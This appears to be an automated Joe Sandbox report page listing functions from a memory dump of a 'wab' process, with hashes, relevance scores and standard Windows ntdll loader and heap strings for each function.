                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                            • API String ID: 0-1356375266
                            • Opcode ID: 50ab8c0e21f837034379bebcfaf909ab3a74f60712fcd5b0627ccb31dc15db52
                            • Instruction ID: fdf8a6cfd3f88ca5a9e97e339ea0cf1ac3423ed3a5387acbe9faa7cd5e64da24
                            • Opcode Fuzzy Hash: 50ab8c0e21f837034379bebcfaf909ab3a74f60712fcd5b0627ccb31dc15db52
                            • Instruction Fuzzy Hash: C8A15A729087459FD321DF24C484B5BBBE8FB88715F004ABFE6A896250D774DA08CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-523794902
                            • Opcode ID: 85a17dde962eaf17a9bc4224c8abfe40e4c65a21bd4e009871416e24e83a34b1
                            • Instruction ID: eba7df37ca239ed74c0b4fc82e0a54279979663f975ecac7e41d43ee3b9ca1ff
                            • Opcode Fuzzy Hash: 85a17dde962eaf17a9bc4224c8abfe40e4c65a21bd4e009871416e24e83a34b1
                            • Instruction Fuzzy Hash: 2742FF35608B819FC311DF28C498A1ABBE5FF98604F084ABEF599CB262D734D945CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                            • API String ID: 0-122214566
                            • Opcode ID: 9735c2ebd2b417ba5b284dca09daef764f854ca393beb060806c0dfc68ecb99f
                            • Instruction ID: d99820f96dcefff9241dd941d29a77331bb31bd96c5718bfe033d38a1e3142e1
                            • Opcode Fuzzy Hash: 9735c2ebd2b417ba5b284dca09daef764f854ca393beb060806c0dfc68ecb99f
                            • Instruction Fuzzy Hash: 85C14835E002559BDF14CF65C8A1B7E7BA5EF85300F0440F9EB81DB291E7B08A40D799
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-792281065
                            • Opcode ID: 142ca5417149d6b67cb49aa6d5845321a66ce62d1554600f80bfb637ac2dc478
                            • Instruction ID: 8eca882d6629dbe3050a748fb80114a57deabb76154371fe73d294e14768eb23
                            • Opcode Fuzzy Hash: 142ca5417149d6b67cb49aa6d5845321a66ce62d1554600f80bfb637ac2dc478
                            • Instruction Fuzzy Hash: 93915531F14B549BDB24EF68C994B9A7BA4EFA4B14F0401F9E910AB392D7748C01CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrredirect.c, xrefs: 23BA8181, 23BA81F5
                            • Loading import redirection DLL: '%wZ', xrefs: 23BA8170
                            • minkernel\ntdll\ldrinit.c, xrefs: 23B6C6C3
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 23BA81E5
                            • LdrpInitializeProcess, xrefs: 23B6C6C4
                            • LdrpInitializeImportRedirection, xrefs: 23BA8177, 23BA81EB
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-475462383
                            • Opcode ID: f2eb7f26ddab438155b7c10f007a80a86c20ce0e066e1239f01cc12f739edc69
                            • Instruction ID: 83d8338901abe33e7228a448705ef2140268a5138b4f5a5ce16b981f49a9dcfc
                            • Opcode Fuzzy Hash: f2eb7f26ddab438155b7c10f007a80a86c20ce0e066e1239f01cc12f739edc69
                            • Instruction Fuzzy Hash: A7311A716057459FC620EF68CD45E1A77E4EFA8B10F0405F8F9959B292E620ED04CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                            Download Yara Rule
                            Strings
                            • Kernel-MUI-Number-Allowed, xrefs: 23B55247
                            • Kernel-MUI-Language-SKU, xrefs: 23B5542B
                            • Kernel-MUI-Language-Allowed, xrefs: 23B5527B
                            • Kernel-MUI-Language-Disallowed, xrefs: 23B55352
                            • WindowsExcludedProcs, xrefs: 23B5522A
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            • API String ID: 0-258546922
                            • Opcode ID: ae9f970cde10ce57a8a2b14bd152d40fde5e690fc78ca07f3463954484b9a5e8
                            • Instruction ID: 8a82767043cf5680ca8a63b6588ae6e1228b3e1467fa971d0cc06a2e4523f25c
                            • Opcode Fuzzy Hash: ae9f970cde10ce57a8a2b14bd152d40fde5e690fc78ca07f3463954484b9a5e8
                            • Instruction Fuzzy Hash: A4F13A72D11219EFCB15DFA8C980E9EBBB9EF58750F1540BAE505E7221E7709E01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1975516107
                            • Opcode ID: 30fb28d63e65f098173a8b3c1cab37bf6db4219287b27a8361ec506de5e9d28b
                            • Instruction ID: fdbb06cc3be7767e0eca9bfdcf9b3fb7f971c20a32525d60aa84eaf66ed01fcf
                            • Opcode Fuzzy Hash: 30fb28d63e65f098173a8b3c1cab37bf6db4219287b27a8361ec506de5e9d28b
                            • Instruction Fuzzy Hash: BE51C071E043859FDB14EFA4C59878EBBB1FF68314F1442BEE9006B2A1D774A981CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                            • API String ID: 0-3061284088
                            • Opcode ID: d6050bf55f9e81b5595139360e3e2d18352d041b059ada53e48c03a531a336fa
                            • Instruction ID: 75098f90d07b693b344516d0dead769ef5e8259bcebef83384e455e2863579e5
                            • Opcode Fuzzy Hash: d6050bf55f9e81b5595139360e3e2d18352d041b059ada53e48c03a531a336fa
                            • Instruction Fuzzy Hash: D8014C32018A90DFD326EF35D449F52BFD4DF56670F1841FAE01487962CEA89C80C164
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                            • API String ID: 0-3178619729
                            • Opcode ID: dc323e3cb793d40efd014daba78c826cdb17269e143963c05ba81f54830634ff
                            • Instruction ID: 7a586576236b9380adbbc21a05da5d520f24c9a937c9a80e32e7ae05ea0a7fd1
                            • Opcode Fuzzy Hash: dc323e3cb793d40efd014daba78c826cdb17269e143963c05ba81f54830634ff
                            • Instruction Fuzzy Hash: 1413CF70E00695CFDB14CF68C4A0BA9BBF1FF48300F1881A9DA59EB791D735A941DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-3570731704
                            • Opcode ID: 35ebf279a76614056c743d9d73e86c2a3a3b8814add4d088866f46917606b8f3
                            • Instruction ID: ca49702bc28537ed09081f2efbc6360ac9b5b9acf0a74d36567dc37b9bfb0062
                            • Opcode Fuzzy Hash: 35ebf279a76614056c743d9d73e86c2a3a3b8814add4d088866f46917606b8f3
                            • Instruction Fuzzy Hash: 9E923671E00268CFEB20DF28C890B99B7B5EF49314F0581FAEA49A7291D7349E81CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                            • API String ID: 0-379654539
                            • Opcode ID: e61b15af25df11af2d3a412fd09eed4c956a438c8b0e48c9dd6408fc76def79f
                            • Instruction ID: 336cda3da25e4be883e2a9dc7d6d40428ac21ef6e83e3e2ad73147ffa451eb39
                            • Opcode Fuzzy Hash: e61b15af25df11af2d3a412fd09eed4c956a438c8b0e48c9dd6408fc76def79f
                            • Instruction Fuzzy Hash: 74C186749083968FD711DF28C040B5AB7F4FF8A704F1489BAF9958B2A0E735CA49CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                            Download Yara Rule
                            Strings
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 23BA22B6
                            • .Local, xrefs: 23B628D8
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 23BA21D9, 23BA22B1
                            • SXS: %s() passed the empty activation context, xrefs: 23BA21DE
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            • API String ID: 0-1239276146
                            • Opcode ID: ddf94de8ee8236993f65455873fc2443c4236fe83327505091092a98ef63513b
                            • Instruction ID: 5e3596965c5438a4ed33c93b2444e9a4072e7bf37e989c2a8f88dc4f7a9ece3b
                            • Opcode Fuzzy Hash: ddf94de8ee8236993f65455873fc2443c4236fe83327505091092a98ef63513b
                            • Instruction Fuzzy Hash: 47A19D35D112299BDB24DF64CC84B99B3B5FF98314F2441FAD948AB2A2D7309E80CF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                            • API String ID: 0-2586055223
                            • Opcode ID: 75d3255bb821dffb56bab6213b4b2f1a6c92c2ff48c217d2684803deb54a8447
                            • Instruction ID: 2b7db7420157ffc13308c049f75c88f843dcc3240696d0ecdd39aea2b6ea0be8
                            • Opcode Fuzzy Hash: 75d3255bb821dffb56bab6213b4b2f1a6c92c2ff48c217d2684803deb54a8447
                            • Instruction Fuzzy Hash: 7761E376205B80AFD312DF24C848F5B7BE9EF84B50F0805F8EA588B2A1D734D941C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                            • API String ID: 0-336120773
                            • Opcode ID: 84d83c2f2b14b208c44796d9fd924e2f35ac04611769898f4e46e6ab92232bd4
                            • Instruction ID: f6f7ebe04caa5145426d51a40f0fcee16daf3bed992024b0c03abf7c21cb1dac
                            • Opcode Fuzzy Hash: 84d83c2f2b14b208c44796d9fd924e2f35ac04611769898f4e46e6ab92232bd4
                            • Instruction Fuzzy Hash: 2E31EE71A00650EFC729DFA8CC81F5677E8EF08660FA401F5E519DB2A1DB34ED42CA65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                            • API String ID: 0-1391187441
                            • Opcode ID: 391ec2a33f9ac1532f6dd19bbacc7a38ad202ad2dd1a0671ff4c5426f0d2a440
                            • Instruction ID: 1290cf897e29d0f8974fb0d666f0ced48caeecbed29d9e0fff0564f0230c81b9
                            • Opcode Fuzzy Hash: 391ec2a33f9ac1532f6dd19bbacc7a38ad202ad2dd1a0671ff4c5426f0d2a440
                            • Instruction Fuzzy Hash: 7A318332A00544EFCB11DF66C884F9ABBB9EF49660F1441F5E928AB291DB74ED40CA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-4253913091
                            • Opcode ID: 563e565dde4189da49e6b3e3349250f06fd630391d661a9aab2a1592fb62b000
                            • Instruction ID: 7d2c90efa8a60a2689cdecdd609caac554ef64ce04ddc8453bdb3a45440d4d47
                            • Opcode Fuzzy Hash: 563e565dde4189da49e6b3e3349250f06fd630391d661a9aab2a1592fb62b000
                            • Instruction Fuzzy Hash: A5F19730A00645DFEB14DF68C9A4F6AB7B5FB44300F1482B9E6159B3A2D734EA81DF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                            • API String ID: 0-1145731471
                            • Opcode ID: f2539385cc250b8a9b3905bca3d49471852768403842e3f650a21556d52262ed
                            • Instruction ID: 544f859e9e06bb857491c4c1d5c06572120c8ab7d19cb595ab851abcfa46cde8
                            • Opcode Fuzzy Hash: f2539385cc250b8a9b3905bca3d49471852768403842e3f650a21556d52262ed
                            • Instruction Fuzzy Hash: 17B1B771A04664CBEB25EF69C880B9DB7B6EF85300F194AB9E955EB394D730E840CF04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                            • API String ID: 0-2391371766
                            • Opcode ID: 401771f2ea85eec02441e1ce305fca5072198307d0609594cb641c5a7df4bb41
                            • Instruction ID: 62a48feac782ddaaccc52a08bc90a629494b39598698be9f5da714d59159af03
                            • Opcode Fuzzy Hash: 401771f2ea85eec02441e1ce305fca5072198307d0609594cb641c5a7df4bb41
                            • Instruction Fuzzy Hash: 1CB1AB72614341AFD311EE54C884F6BB7F9EB58710F1109B9FA589B290DBB4EC04CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            • API String ID: 0-2779062949
                            • Opcode ID: 0c852251a7a6eff3c9432252fcb22b6b6f4738313de429d8368dbab4adc2e852
                            • Instruction ID: 865004986abbfb544511daef320312cce4741cfdebe6b6f74e56123e72f6c314
                            • Opcode Fuzzy Hash: 0c852251a7a6eff3c9432252fcb22b6b6f4738313de429d8368dbab4adc2e852
                            • Instruction Fuzzy Hash: 2AA17A72D126299BDB21DF24CC88B9AB7B8EF48701F1401FAE909A7260D7359F85CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                            • API String ID: 0-318774311
                            • Opcode ID: 7be3a18241193a203840206da86ee2232ad8dbb9a2324a686f64bc5dcd2b0c16
                            • Instruction ID: 28d62f0170afccfbdaf9f180c751df6bc1324079b04e5f606be580cfa6d41c05
                            • Opcode Fuzzy Hash: 7be3a18241193a203840206da86ee2232ad8dbb9a2324a686f64bc5dcd2b0c16
                            • Instruction Fuzzy Hash: 31817E71608380AFD721DF14C844F6AB7E8FF89750F4409B9BA999B3A0D778D904CB5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: %$&$@
                            • API String ID: 0-1537733988
